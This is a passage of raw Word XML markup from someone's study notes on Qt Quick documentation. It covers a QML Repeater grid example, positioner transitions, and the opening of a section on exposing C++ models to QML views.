          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import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QtQuick</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2.0</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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width</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400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height</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400</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color</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"black"</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Grid</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x</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5</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y</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5</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rows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5</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columns</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5</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spacing</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w: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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10</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630F70" w:rsidRPr="008D4C56" w:rsidRDefault="00630F70" w:rsidP="00630F70">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Repeater</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model</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="008D4C56" w:rsidRDefault="00630F70" w:rsidP="00630F70">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Rectangle</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width</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>70</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height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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>70</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="008D4C56" w:rsidRDefault="00630F70" w:rsidP="00630F70">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color</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"lightgreen"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="008D4C56" w:rsidRDefault="00630F70" w:rsidP="00630F70">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p>
    <w:p w:rsidR="00630F70" w:rsidRPr="008D4C56" w:rsidRDefault="00630F70" w:rsidP="00630F70">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Text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text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index</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="008D4C56" w:rsidRDefault="00630F70" w:rsidP="00630F70">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font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pointSize</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="008D4C56" w:rsidRDefault="00630F70" w:rsidP="00630F70">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anchors</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centerIn</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parent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630F70" w:rsidRPr="008D4C56" w:rsidRDefault="00630F70" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="00630F70">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630F70">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w: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HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70"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The number of items created by a Repeater is held by its</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2597" w:anchor="count-prop" w:history="1">
        <w:r w:rsidRPr="00882993">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>count</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">property. It is not possible to set this property to determine the number of items to be created. Instead, as in the above example, we use an </w:t>
      </w:r>
      <w:r w:rsidRPr="00882993">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>integer as the model</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This is explained in the</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2598" w:anchor="integers-as-models" w:history="1">
        <w:r w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Data Models</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00966F82" w:rsidRDefault="00630F70" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">It is also possible to use a delegate as the template for the items created by a Repeater. </w:t>
      </w:r>
      <w:r w:rsidRPr="00966F82">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This is specified using the</w:t>
      </w:r>
      <w:r w:rsidRPr="00966F82">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2599" w:anchor="delegate-prop" w:history="1">
        <w:r w:rsidRPr="00882993">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>delegate</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00882993">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00882993">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidRPr="00966F82">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="006200A6">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2330" w:name="using-transitions"/>
      <w:bookmarkStart w:id="2331" w:name="_Toc483001032"/>
      <w:bookmarkStart w:id="2332" w:name="_Toc483004023"/>
      <w:bookmarkStart w:id="2333" w:name="_Toc483604373"/>
      <w:bookmarkStart w:id="2334" w:name="_Toc483605593"/>
      <w:bookmarkEnd w:id="2330"/>
      <w:r w:rsidRPr="006200A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Using Transitions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2331"/>
      <w:bookmarkEnd w:id="2332"/>
      <w:bookmarkEnd w:id="2333"/>
      <w:bookmarkEnd w:id="2334"/>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882993">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Transitions can be used to animate items that are added to, moved within, or removed from a positioner</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Transitions for adding</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> items apply to items that are created as part of a positioner, as well as those that are reparented to become children of a positioner.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRDefault="00630F70" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Transitions for removing</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> items apply to items within a positioner that are deleted, as well as those that are removed from a positioner and given new parents in a document.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006200A6" w:rsidRPr="006200A6" w:rsidRDefault="006200A6" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">//  </w:t>
      </w:r>
      <w:r w:rsidRPr="006200A6">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intbu on examples</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRDefault="00630F70" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006200A6">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Changing the opacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of items to zero will not cause them to disappear from the positioner. They </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be removed and re-added by changing the visible property</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="00630F70" w:rsidRDefault="0088385D" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00840F02" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2600" w:history="1">
        <w:r w:rsidR="000B1D83" w:rsidRPr="00E20DF4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-modelviewsdata-cppmodels.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="006200A6" w:rsidRDefault="0088385D" w:rsidP="006200A6">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2335" w:name="_Toc483001033"/>
      <w:bookmarkStart w:id="2336" w:name="_Toc483004024"/>
      <w:bookmarkStart w:id="2337" w:name="_Toc483604374"/>
      <w:bookmarkStart w:id="2338" w:name="_Toc483605594"/>
      <w:r w:rsidRPr="006200A6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using C++ Models with Qt Quick Views</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2335"/>
      <w:bookmarkEnd w:id="2336"/>
      <w:bookmarkEnd w:id="2337"/>
      <w:bookmarkEnd w:id="2338"/>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="0088385D" w:rsidRDefault="0088385D" w:rsidP="006200A6">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2339" w:name="data-provided-in-a-custom-c-model"/>
      <w:bookmarkStart w:id="2340" w:name="_Toc483001034"/>
      <w:bookmarkStart w:id="2341" w:name="_Toc483004025"/>
      <w:bookmarkStart w:id="2342" w:name="_Toc483604375"/>
      <w:bookmarkStart w:id="2343" w:name="_Toc483605595"/>
      <w:bookmarkEnd w:id="2339"/>
      <w:r w:rsidRPr="006200A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Data Provided In A Custom C++ Model</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2340"/>
      <w:bookmarkEnd w:id="2341"/>
      <w:bookmarkEnd w:id="2342"/>
      <w:bookmarkEnd w:id="2343"/>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="0088385D" w:rsidRDefault="0088385D" w:rsidP="0088385D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Models can be defined in C++ and then made available to QML</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This is useful for exposing existing C++ data models or otherwise complex datasets to QML.</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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A C++ model class can be defined as a</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2601" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QStringList</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, a</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2602" w:anchor="QObjectList-typedef" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObjectList</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or a</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2603" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QAbstractItemModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>first two are useful for exposing simpler datasets</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, while</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2604" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QAbstractItemModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>provides a more flexible solution for more complex models</w:t>
      </w:r>
